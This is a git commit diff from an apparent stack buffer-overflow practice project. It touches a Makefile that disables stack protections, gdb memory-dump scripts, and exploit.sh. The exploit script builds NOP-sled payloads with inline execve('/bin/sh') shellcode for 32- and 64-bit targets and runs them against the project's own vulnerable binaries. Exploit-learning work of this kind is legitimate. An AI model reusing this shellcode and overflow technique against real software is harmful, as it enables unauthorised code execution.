improvements

Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
author: Toni Uhlig <matzeton@googlemail.com> 2018-07-11 10:19:46 +0200
committer: Toni Uhlig <matzeton@googlemail.com> 2018-07-11 10:19:46 +0200
commit: d3706047194005ce1cb97c2909f25bd1877115f1 (patch)
tree: 7dcca9752a891e8feb068d8a600884d0c7948d73
parent: 71e27ae1766e0090fa989aad7ee930152a1921de (diff)
4 files changed, 7 insertions, 7 deletions
diff --git a/Makefile b/Makefile
index 5ab7706..aff3b9e 100644
--- a/Makefile
+++ b/Makefile
@@ -4,7 +4,7 @@ RM := rm
 CC := gcc
 STRIP := strip
 LBITS := $(shell getconf LONG_BIT)
-CFLAGS += -Wall -O0
+CFLAGS += -Wall -O0 -g
 OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
 X86_FLAGS = -m32 -mpreferred-stack-boundary=2
 X64_FLAGS = -m64 -mpreferred-stack-boundary=4
diff --git a/dump32.gdb b/dump32.gdb
index aa088da..96d5fac 100644
--- a/dump32.gdb
+++ b/dump32.gdb
@@ -1,3 +1,3 @@
-run
-info r
+r
+i r
 x/300xw $esp-0x300
diff --git a/dump64.gdb b/dump64.gdb
index 3facd15..4fb75de 100644
--- a/dump64.gdb
+++ b/dump64.gdb
@@ -1,3 +1,3 @@
-run
-info r
+r
+i r
 x/300xw $rsp-0x300
diff --git a/exploit.sh b/exploit.sh
index d986fe4..92fad29 100755
--- a/exploit.sh
+++ b/exploit.sh
@@ -67,14 +67,14 @@ if [ "$1" = "local32" ]; then
 	# NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
 	# uses own shellcode: shellcode/hello.asm (x86-nasm)
 	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
-	./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
+	gdb -ex r --args ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
 
 elif [ "$1" = "local64" ]; then
 
 	# NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
 	# uses own shellcode: shellcode/execve_x64.o
 	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
-	gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
+	gdb -ex r --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
 
 elif [ "$1" = "bind32" ]; then
author	Toni Uhlig <matzeton@googlemail.com>	2018-07-11 10:19:46 +0200
committer	Toni Uhlig <matzeton@googlemail.com>	2018-07-11 10:19:46 +0200
commit	d3706047194005ce1cb97c2909f25bd1877115f1 (patch)
tree	7dcca9752a891e8feb068d8a600884d0c7948d73
parent	71e27ae1766e0090fa989aad7ee930152a1921de (diff)